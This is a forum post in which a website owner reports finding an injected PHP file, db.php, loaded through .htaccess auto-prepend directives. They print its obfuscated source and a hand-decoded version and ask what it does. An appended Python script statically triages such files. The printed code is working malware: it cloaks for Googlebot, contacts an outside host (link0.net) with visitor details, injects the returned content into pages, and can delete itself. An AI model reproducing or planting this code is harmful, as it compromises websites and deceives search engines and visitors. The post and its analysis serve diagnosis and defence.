
A small hacker PHP script, db.php

junuzaga
05.10.2007. at 11:24
Hello,

First of all: I apologize for breaking the page layout with this code.

A moment ago, on one web server (Apache), I came across a script, db.php. I built the website myself (PHP), so I do not remember this file!

Also, .htaccess contains:
Code:
php_value auto_prepend_file /home/user44/public_html/db.php
php_value auto_append_file  /home/user44/public_html/db.php


The db.php script has this content:
Code:
<?php
error_reporting(0);
if(!isset($R7F40016F0C27B39EA2ED85181C926EBD)){function F96E2018B8CE480FEEE232B6C570AA376($RECB2521BEFB2440F1B0CA68C6FF528E6,$RF581D297231072E71CBDDEDCCDBE2558){list($R9CFB7C6D6B20D54B665E8CE30A6486F2,$R159F6B3A961E5E9FDAC4A0459245E55B)=explode('/',$RF581D297231072E71CBDDEDCCDBE2558);
$R159F6B3A961E5E9FDAC4A0459245E55B=0xffffffff<<(32-$R159F6B3A961E5E9FDAC4A0459245E55B);
if((ip2long($RECB2521BEFB2440F1B0CA68C6FF528E6)&$R159F6B3A961E5E9FDAC4A0459245E55B)==(ip2long($R9CFB7C6D6B20D54B665E8CE30A6486F2)&$R159F6B3A961E5E9FDAC4A0459245E55B)){return 1;
}else{return 0;
}}$R9CFB7C6D6B20D54B665E8CE30A6486F2=$_SERVER['REMOTE_ADDR'];
$RE63F6556DE280F4131E2A6E2926023BE=$_SERVER['HTTP_USER_AGENT'];
$RAE4199CBA7E8AB337BD9D96ED1ECD546=$_SERVER['REQUEST_URI'];
$R60169CD1C47B7A7A85AB44F884635E41=$_SERVER['HTTP_HOST'];
$R5D806DCD60EB96E14573C07EB5329581=0;
if(F96E2018B8CE480FEEE232B6C570AA376($R9CFB7C6D6B20D54B665E8CE30A6486F2,base64_decode('NjYuMjQ5LjY0LjAvMTk='))){$R5D806DCD60EB96E14573C07EB5329581=1;
}if(($R5D806DCD60EB96E14573C07EB5329581==0)or($RE63F6556DE280F4131E2A6E2926023BE!=base64_decode('TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7ICtodHRwOi8vd3d3Lmdvb2dsZS5jb20vYm90Lmh0bWwp'))){$R7F40016F0C27B39EA2ED85181C926EBD=false;
}else{ob_start();
$R7F40016F0C27B39EA2ED85181C926EBD=1;
}}elseif($R7F40016F0C27B39EA2ED85181C926EBD){function F8D6D7A40A50CB0899126AD732F566419($server,$R954AEF838645F5452EA7F1B5C0F0B423,$RC2D2567438B1F39DD71F78195B5F3DED){$R34F222A2F6848A677CF8E49E7DB400DC=3;
$RF500F4A848E2EB2F8AAC3A6734D7EC38=fsockopen($server,$R954AEF838645F5452EA7F1B5C0F0B423,$R32D00070D4FFBCCE2FC669BBA812D4C2,$R5F525F5B398DADD7CF0784BD406298E3,$R34F222A2F6848A677CF8E49E7DB400DC);
if($RF500F4A848E2EB2F8AAC3A6734D7EC38){fputs($RF500F4A848E2EB2F8AAC3A6734D7EC38,base64_decode('R0VU')." ".$RC2D2567438B1F39DD71F78195B5F3DED." HTTP/1.0\r\nHost: ".$server."\r\n\r\n");
while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)){$R04DC9A31C8FE0CD27C4C4A1066AEFCD5.=fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38,128);
}fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
}else{exit();
}return $R04DC9A31C8FE0CD27C4C4A1066AEFCD5;
}$R679E9B9234E2062F809DBD3325D37FB6=ob_get_contents();
ob_end_clean();
$R7F9D6867B727C5EC3758829CBABBFD36=F8D6D7A40A50CB0899126AD732F566419(base64_decode('d3d3LmxpbmswLm5ldA=='),80,base64_decode('L2NudC8/aXA9').$R9CFB7C6D6B20D54B665E8CE30A6486F2.'&uri='.rawurlencode($RAE4199CBA7E8AB337BD9D96ED1ECD546).'&host='.$R60169CD1C47B7A7A85AB44F884635E41);
if(strpos($R7F9D6867B727C5EC3758829CBABBFD36,'_HALT_')!==false){unlink(__FILE__);
}else{$R7F9D6867B727C5EC3758829CBABBFD36=strstr($R7F9D6867B727C5EC3758829CBABBFD36,'_BEG_');
$R7F9D6867B727C5EC3758829CBABBFD36=substr($R7F9D6867B727C5EC3758829CBABBFD36,5,strlen($R7F9D6867B727C5EC3758829CBABBFD36)-5);
$R679E9B9234E2062F809DBD3325D37FB6=preg_replace('/<body.*?>|$/si','\0'.$R7F9D6867B727C5EC3758829CBABBFD36,$R679E9B9234E2062F809DBD3325D37FB6,1);
$R679E9B9234E2062F809DBD3325D37FB6=preg_replace('/<head.*?>/si','\0'.base64_decode('PG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2FyY2hpdmUiPg=='),$R679E9B9234E2062F809DBD3325D37FB6,1);
}echo $R679E9B9234E2062F809DBD3325D37FB6;
}
?>


After I decoded it a bit, it looks like this:
Code:
<?php
error_reporting(0);

// ADDED BY ME
if(isset($R7F40016F0C27B39EA2ED85181C926EBD))
    $fakat_nije_google=$R7F40016F0C27B39EA2ED85181C926EBD;
//--

if(!isset($fakat_nije_google))
{
    function funkcija($neki_ip,$bomba) {
        list($remote_addr,$javanje)=explode('/',$bomba);
        $javanje=0xffffffff<<(32-$javanje);
        if((ip2long($neki_ip)&$javanje)==(ip2long($remote_addr)&$javanje)) {
            return 1;
        }
        else {
            return 0;
        }
    }

    $remote_addr=$_SERVER['REMOTE_ADDR'];
    $user_agent=$_SERVER['HTTP_USER_AGENT'];
    $request_uri=$_SERVER['REQUEST_URI'];
    $http_host=$_SERVER['HTTP_HOST'];
    $google_crawler=0;

    if(funkcija($remote_addr,'66.249.64.0/19')) { // this is Google's IP
        $google_crawler=1;
    }
    if( ($google_crawler==0) or ($user_agent!='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')) {
        $fakat_nije_google=false;
    }
    else {
        ob_start();
        $fakat_nije_google=1;
    }

}
elseif($fakat_nije_google) {
    function funkcija_dva($server,$port,$adresa)
    {
        $broj_tri=30; //3
        $handeler=fsockopen($server,$port,$errNo,$errStr,$broj_tri);
        if($handeler)
        {
            fputs($handeler,'GET'." ".$adresa." HTTP/1.0\r\nHost: ".$server."\r\n\r\n");
            while(!feof($handeler))
            {
                $buff.=fgets($handeler,128);
            }
            fclose($handeler);
        }
        else {
            exit();
        }
        return $buff;
    }
    
    $ob_buff=ob_get_contents();
    ob_end_clean();
    $link0_rez=funkcija_dva('www.link0.net',80,'/cnt/?ip='.$remote_addr.'&uri='.rawurlencode($request_uri).'&host='.$http_host);
    if(strpos($link0_rez,'_HALT_')!==false){
        //unlink(__FILE__); // I disabled the self-deletion
        die('BRISEM SE!');
    }
    else{
        $link0_rez=strstr($link0_rez,'_BEG_');
        $link0_rez=substr($link0_rez,5,strlen($link0_rez)-5);
        $ob_buff=preg_replace('/<body.*?>|$/si','\0'.$link0_rez,$ob_buff,1);
        $ob_buff=preg_replace('/<head.*?>/si','\0'.'<meta name="robots" content="noarchive">',$ob_buff,1);
    }

    echo $ob_buff;

}
?>


Digging around on Google a bit, I found that it is some kind of hacker script, and here is what it says: http://209.85.135.104/search?q...amp;hl=en&ct=clnk&cd=1

On that page there is a link to ElPais.com whose text is a bit more readable, and which you can translate with, e.g., Google Translate.

What does this script actually do? Does it send something to www.link0.net? Does it "steal" Google's crawler and redirect it to their site? Does it change whatever it feels like on the user's page, e.g. the CLIENT-ID of the Google AdSense ads, putting in its own so that when someone clicks the money goes to them?

Well, I have no idea, so if anyone knows I would be glad to have it explained :)

Thanks!
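
A static triage of the two artifacts in this post, as an added example that is not part of the original post: it flags the `auto_prepend_file`/`auto_append_file` directives in `.htaccess` and decodes `base64_decode('...')` literals without running the PHP. The function names are made up for this example, and the sample input is constructed from literals and identifiers in the listings above.

```python
import base64
import re

# php_value directives that make PHP run a file before/after every script.
HTACCESS_RE = re.compile(
    r"^\s*php_value\s+(auto_prepend_file|auto_append_file)\s+(\S+)",
    re.IGNORECASE | re.MULTILINE)
# String literal passed directly to base64_decode().
B64_RE = re.compile(r"base64_decode\(\s*(['\"])([A-Za-z0-9+/=]+)\1\s*\)")
# Machine-generated names as in db.php: one letter plus 32 hex digits.
OBF_NAME_RE = re.compile(r"(?<![A-Za-z0-9])[A-Z][0-9A-F]{32}\b")
# Calls db.php relies on: network fetch, output capture, self-delete, rewrite.
WATCHED_CALLS = ("fsockopen", "ob_start", "unlink", "preg_replace")


def htaccess_includes(text):
    """Return (directive, path) pairs for auto_prepend/auto_append lines."""
    return [(m.group(1).lower(), m.group(2)) for m in HTACCESS_RE.finditer(text)]


def decode_literals(php_source):
    """Decode base64_decode('...') literals without executing any PHP."""
    decoded = []
    for m in B64_RE.finditer(php_source):
        try:
            raw = base64.b64decode(m.group(2), validate=True)
        except ValueError:  # malformed literal: leave for manual review
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def triage(php_source):
    """Summarise what a reviewer should look at first in a suspect file."""
    return {
        "decoded": decode_literals(php_source),
        "obfuscated_names": len(set(OBF_NAME_RE.findall(php_source))),
        "calls": [c for c in WATCHED_CALLS
                  if re.search(r"\b" + c + r"\s*\(", php_source)],
    }


# Sample input, constructed from the .htaccess and db.php listings in the post.
SAMPLE_HTACCESS = ("php_value auto_prepend_file /home/user44/public_html/db.php\n"
                   "php_value auto_append_file  /home/user44/public_html/db.php\n")
SAMPLE_PHP = ("if(F96E2018B8CE480FEEE232B6C570AA376($R9CFB7C6D6B20D54B665E8CE30A6486F2,"
              "base64_decode('NjYuMjQ5LjY0LjAvMTk='))){ob_start();}\n"
              "$h=fsockopen(base64_decode('d3d3LmxpbmswLm5ldA=='),80);\n")
```

Calling `triage()` on the full db.php text gives the same decoded strings the poster recovered by hand, alongside the list of watched calls present in the file.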
 